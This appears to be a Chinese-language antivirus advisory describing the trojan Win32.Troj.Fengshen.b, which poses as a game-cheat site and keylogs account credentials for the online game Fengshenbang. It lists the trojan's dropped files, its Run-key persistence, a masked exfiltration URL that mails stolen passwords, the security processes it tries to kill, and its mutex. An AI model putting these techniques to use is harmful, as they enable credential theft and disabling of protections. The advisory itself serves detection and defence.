Win32.Troj.Fengshen.b

這個病毒偽裝成為外掛網站，欺騙用戶下載進行傳播。機器中毒後，竊取用戶的《封神榜》網遊的賬號木馬，從而給用戶的虛擬財產帶來損失。

1、將自身釋放到：

%SystemRoot%\inf\rundll32.exe （病毒自身）

%System%\fsdll.dll （用於監視鍵盤操作）

c:\gamefs.txt（用於記錄敏感信息）

2、在註冊表中添加如下鍵值：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

"loadMefs" = "%SystemRoot%\inf\rundll32.exe"

3、病毒運行後，當前視窗類為

FSOnline Class

視窗標題為：

封神榜·網路版

時，監視用戶的滑鼠和鍵盤操作，以記錄用戶的賬號和密碼。

3、該病毒通過以下ASP腳本傳送郵件，郵件內容竊取的密碼和賬號：

http://www.×××××.com/fsb/sendmail.asp?tomail=XXXXXXXXXX&mailbody=XXXXXXXXXX

（該網站首頁慌稱為外掛網站，但下載所謂外掛均為病毒）

4、郵件的內容為：

伺服器:

戶名:

密碼:

物品密碼:

IP:

機器名:

4、該病毒嘗試關閉以下安全軟體或進程：

密碼防盜專家 綜合版

PasswordGuard.exe

天網防火牆個人版

天網防火牆企業版

噬菌體

EGHOST.EXE

MAILMON.EXE

KAVPFW.EXE

IPARMOR.EXE

5、該病毒生成以下互斥量

SemaphorefsMuMa

以保證只有一個進程運行。